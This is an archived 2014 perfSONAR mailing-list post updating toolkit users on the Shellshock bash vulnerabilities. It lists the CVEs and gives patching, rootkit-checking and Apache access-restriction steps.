Skip to Content.
Sympa Menu

perfsonar-user - [perfsonar-user] Updated information on Shellshock for perfSONAR Toolkit Users

Subject: perfSONAR User Q&A and Other Discussion

List archive

[perfsonar-user] Updated information on Shellshock for perfSONAR Toolkit Users


Chronological Thread 
  • From: Jason Zurawski <>
  • To: perfsonar-user <>, perfsonar-announce <>
  • Cc: "" <>
  • Subject: [perfsonar-user] Updated information on Shellshock for perfSONAR Toolkit Users
  • Date: Mon, 29 Sep 2014 17:58:22 -0400

Greetings;

We have 2 pieces of news to report on the ongoing shellshock situation:

1) As of this afternoon we have not seen any additional patches made by the
upstream vendors. For those playing the home game here are the current list
if vulnerabilities:

> CVE-2014-6271 [Original vulnerability]
> CVE-2014-6277
> CVE-2014-6278
> CVE-2014-7169
> CVE-2014-7186
> CVE-2014-7187

Note that if you 'yum update'd last week, you should check again to be sure
you have the 'latest', this is because new vulnerabilities were announced
right after the initial fix was released. We will continue to monitor the
situation and keep everyone posted on things we see. If you haven't enabled
yum auto-updating yet - consider reading this to do so:
http://www.perfsonar.net/about/faq/#Q53

Many of you have emailed to note that speed is the most important asset in
patching this vulnerability - even if you were 'fast' there is a chance you
could have been beaten. We would suggest verifying your systems to check for
rootkits (rkhunter and chkrootkit are popular products), and/or if someone is
running an IRC bot. When in doubt, yank it off the network and rebuild.

2) Working with community members, we have identified 2 ways to further
reduce the risk of perfSONAR Toolkit systems. Note that the risk does not
fully go away until bash is completely patched. These two approaches can help
in the meantime by reducing the visibility via the web:

a) A new RPM for version 3.3 (netinstall only) of the toolkit environment was
built, and is now available in yum - it is 3.3.2-18. The modification in
this update prevent the Perl interpreter from using bash for some of its
operations, some functionality will be reduced as a result. Please do the
following to get this update:

- yum update

- reboot the system

b) If you are using a 3.3 LiveCD, or a 3.4 (RC*) installation, we are working
on updated builds to address the problem as in part a). In the meantime, the
following modifications can be made to the apache configuration to lock down
*all* access to the Toolkit web interface:

- Open the configuration file:
/etc/httpd/conf.d/apache-toolkit_web_gui.conf

- Search for instances of these permissions:

> Order allow,deny
> Allow from all

- Modify the permissions to look like this (replacing the obvious
fake address with a real one, multiple 'Allow' lines are permitted):

> Order deny,allow
> Allow from AAA.BBB.CCC.DDD/16
> Deny from All

- restart httpd (sudo /etc/init.d/httpd restart) or reboot

Please reach out to us at

if you have additional questions on status of the vulnerability or our
response.

Thanks;

-jason


Archive powered by MHonArc 2.6.16.

Top of Page